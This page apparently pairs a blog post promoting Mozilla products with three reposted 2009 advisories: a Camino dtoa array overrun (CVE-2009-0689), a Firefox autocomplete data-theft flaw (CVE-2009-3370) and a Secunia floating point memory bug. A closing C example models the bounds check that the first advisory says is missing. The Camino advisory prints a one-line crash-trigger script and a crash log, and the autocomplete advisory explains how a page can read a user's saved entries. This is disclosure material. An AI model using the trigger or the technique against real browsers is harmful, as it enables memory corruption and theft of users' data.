Mozilla Firefox, conquering the world…

As you have probably heard, Mozilla Firefox 3.5 is the most popular browser in the world. If you don't have it yet, download it here. If you already use Mozilla Firefox, remember that the Mozilla Foundation also has other products:

  • Thunderbird. A high-quality mail reader, equivalent in functionality to Outlook, but open source. Very useful overall, with frequent updates for both functionality and security. Download it here.
  • SeaMonkey. Were you a Netscape Navigator user? Do you remember that it integrated a mail reader, a browser and a chat client? Well, SeaMonkey reimplements that suite. Download it here.
  • Bugzilla. If you need to track tickets/bugs, you can use Bugzilla, a classic system that helps you through the whole software quality process (or that of any similar product). Download it here.
  • Camino. Mozilla's well-known Gecko-based browser, but with the Mac look and feel. Very fast and pleasant. Download it here.

In addition to these products, there are thousands of extensions and add-ons for Firefox, free!

Camino 1.6.10 Remote Array Overrun (Arbitrary code execution)

cxib@securityreason.com

to bugtraq



[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Camino 1.6.10

Fixed in:
- Camino 2.0 <=

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/76

--- 0. Description ---
Camino (from the Spanish word camino meaning “way”, “path” or “road”) is a free, open source, GUI-based Web browser based on Mozilla’s Gecko layout engine and specifically designed for the Mac OS X operating system. In place of an XUL-based user interface used by most Mozilla-based applications, Camino uses Mac-native Cocoa APIs, although it does not use native text boxes.

--- 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ---
The main problem exists in the dtoa implementation. Camino has the same dtoa as Firefox, SeaMonkey, Chrome, Opera etc.
and it is the same as SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but the fix for SREASONRES:20090625 used by OpenBSD was not good.
More information about the fix for OpenBSD and similar: SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory.
Kmax is defined as 15. Functions in dtoa don’t check the Kmax limit, and
it is possible to call 16<= elements of the freelist array.

--- 2. Proof of Concept (PoC) ---
-----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
-----------------------

Process:         Camino [153]
Path:            /Volumes/Camino/Camino.app/Contents/MacOS/Camino
Identifier:      org.mozilla.camino
Version:         1.6.10 (1609.09.25)
Code Type:       X86 (Native)
Parent Process:  launchd [92]

Date/Time:       2009-11-06 12:57:24.698 -0800
OS Version:      Mac OS X 10.5.6 (9G55)
Report Version:  6

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x000000007e33d590
Crashed Thread:  0


--- 3. SecurityReason Note ---
Officially SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock

This list is not yet closed.

--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c

--- 5. Credits ---
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.

--- 6. Greets ---
Infospec p_e_a pi3

--- 7. Contact ---
Email:
- cxib {a.t] securityreason [d0t} com
- sp3x {a.t] securityreason [d0t} com

GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- http://securityreason.com/key/sp3x.gpg

http://securityreason.com/
http://securityreason.pl/


Autocomplete Data Theft in Mozilla Firefox

===============================ADVISORY===============================

Name: Autocomplete Data Theft in Mozilla Firefox
Systems Affected: Mozilla Firefox 3.5, Mozilla Firefox 3.0
Severity: Moderate
Category: Data Leakage
Author: Context Information Security Ltd
Advisory: 4 November 2009
CVE: CVE-2009-3370

===============================ADVISORY===============================

Description:
------------
A malicious web page can extract out all the data stored within the autocomplete history of a user’s Firefox browser. The web page must convince a user to hold down the left or right-arrow keys then the contents of the autocomplete popup can be read. This may include the search history box within the browser, or other personal details.

Analysis
--------
A malicious web page can be created that includes a text field with the same ‘name’ attribute as data entered on other sites (e.g. ‘q’ for Google). The form autocompletion popup in Firefox can then be triggered and manipulated by a variety of key presses. For example, by pressing the ‘a’ key, autocomplete entries starting with that letter will be shown. Entries in the popup can be selected by using the up/down arrow keys. When the left or right arrow key is pressed, the currently selected entry from the popup is entered into the text field and can be read through JavaScript.

In Firefox, a web page can use the ‘createEvent’ and ‘initKeyEvent’ JavaScript methods to create synthetic key events. It was discovered that these events could be used to trigger an autocomplete popup and change the currently selected entry in the popup.

However, it was not possible for synthetic events to cause the text field to be filled with the current entry. Therefore some user interaction is required to enable the web page to steal the contents of the drop-down. If a web page can convince a user to hold down or repeatedly press the left or right-arrow keys, it can systematically grab each entry in the drop-down box.

Technologies Affected
---------------------
Mozilla Firefox 3.5.3 and below
Mozilla Firefox 3.0.0.14 and below

Resolution
----------
Mozilla fixed this issue in the 3.5.4 and 3.0.0.15 releases of Firefox:

http://www.mozilla.org/security/announce/2009/mfsa2009-52.html

CVE
---
This issue has been assigned CVE number CVE-2009-3370.

Disclosure Timeline
-------------------
8th August 2009 – Initial Discovery and Vendor Notification
8th August 2009 – Vendor Response
27 October 2009 – Vendor Advisory Release
4 November 2009 – Context Information Security Advisory Release

Credits
-------
Paul Stone of Context Information Security Ltd

About Context Information Security
----------------------------------
Context Information Security Limited is a specialist information security consultancy based in London and Dusseldorf.
Context promotes the holistic approach to information security and helps clients to identify, assess and control their exposure to risk within the fields of IT, telephony and physical security. Context employs experienced information security professionals who are subject-matter experts in their various technical specialisms. Context works extensively within the finance, legal, defence and government sectors, delivering high-end information security projects to organisations for which security is a priority.

Web: www.contextis.co.uk
Email: disclosure@contextis.co.uk

Mozilla Firefox Floating Point Memory Allocation Vulnerability

======================================================================

Secunia Research 28/10/2009

- Mozilla Firefox Floating Point Memory Allocation Vulnerability -

======================================================================
Table of Contents

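Affected Software....................................................1
Severity.............................................................2
Vendor’s Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10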

======================================================================
1) Affected Software

* Mozilla Firefox 3.0.14 and 3.5.3.

NOTE: Prior versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where: Remote

======================================================================
3) Vendor’s Description of Software

“The award-winning Firefox Web browser has security, speed and new
features that will change the way you use the Web. Don’t settle for
anything less.”

Product Link:
http://www.mozilla.com/firefox/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Mozilla Firefox,
which can be exploited by malicious people to compromise a user’s
system.

The vulnerability is caused due to an array indexing error while
allocating space for floating point numbers. This can be exploited to
trigger a memory corruption when a specially crafted floating point
number is processed.

Successful exploitation allows execution of arbitrary code.

======================================================================
5) Solution

Update to version 3.0.15 or 3.5.4.

======================================================================
6) Time Table

14/09/2009 – Vendor notified.
14/09/2009 – Vendor response.
28/10/2009 – Public disclosure.

======================================================================
7) Credits

Discovered by Alin Rad Pop, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-1563 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-35/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
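
Added example (not code from the advisories above or from any of the affected projects): a simplified C model of the freelist indexing problem the Camino advisory describes (Kmax of 15, no limit check before the freelist array is indexed), which is also the kind of array indexing error during floating point allocation that the Secunia advisory reports. The struct layout, the sizing rule, the MAX_K cap and all function names are assumptions made for illustration; the unchecked behaviour appears only in comments.

```c
#include <stdio.h>
#include <stdlib.h>

#define Kmax  15   /* freelist limit quoted in the Camino advisory */
#define MAX_K 24   /* hypothetical hard cap on a single allocation */

typedef struct Bigint {
    struct Bigint *next;
    int k;                 /* size class: room for 1 << k 32-bit words */
    int maxwds;
    unsigned int x[1];
} Bigint;

static Bigint *freelist[Kmax + 1];   /* only indexes 0..Kmax exist */

/* Size class for a decimal literal of nd digits: nine digits per word,
 * rounded up to a power of two (assumed sizing rule for this model). */
int size_class_for_digits(long nd)
{
    long words = (nd + 8) / 9, cap = 1;
    int k = 0;
    while (words > cap) { cap <<= 1; k++; }
    return k;
}

/* The test the advisory says is missing before freelist[k] is touched. */
int uses_freelist(int k) { return k >= 0 && k <= Kmax; }

/* Unchecked form: rv = freelist[k] for any k, so k = 16 reads past the array.
 * Checked form: classes above Kmax bypass the cache and go to malloc. */
Bigint *balloc_checked(int k)
{
    Bigint *rv;
    if (k < 0 || k > MAX_K) return NULL;
    if (uses_freelist(k) && (rv = freelist[k]) != NULL) {
        freelist[k] = rv->next;            /* reuse a cached block */
    } else {
        size_t words = (size_t)1 << k;
        rv = malloc(sizeof(Bigint) + (words - 1) * sizeof(unsigned int));
        if (rv == NULL) return NULL;
        rv->k = k;
        rv->maxwds = (int)words;
    }
    rv->next = NULL;
    return rv;
}

/* Unchecked form: freelist[v->k] = v writes past the array for k > Kmax.
 * Returns 1 if the block was cached, 0 if it was released (or was NULL). */
int bfree_checked(Bigint *v)
{
    if (v == NULL) return 0;
    if (!uses_freelist(v->k)) { free(v); return 0; }  /* oversized: not cached */
    v->next = freelist[v->k];
    freelist[v->k] = v;
    return 1;
}

int main(void)
{
    int k = size_class_for_digits(296450);   /* digit count used in the PoC */
    Bigint *b = balloc_checked(k);
    printf("class %d, cached: %s\n", k, uses_freelist(k) ? "yes" : "no");
    bfree_checked(b);
    return 0;
}
```

Under this model the 296450-digit literal from the proof of concept lands in size class 16, one past the last valid freelist slot, which is why the bounds test has to sit in both the allocate and the free path.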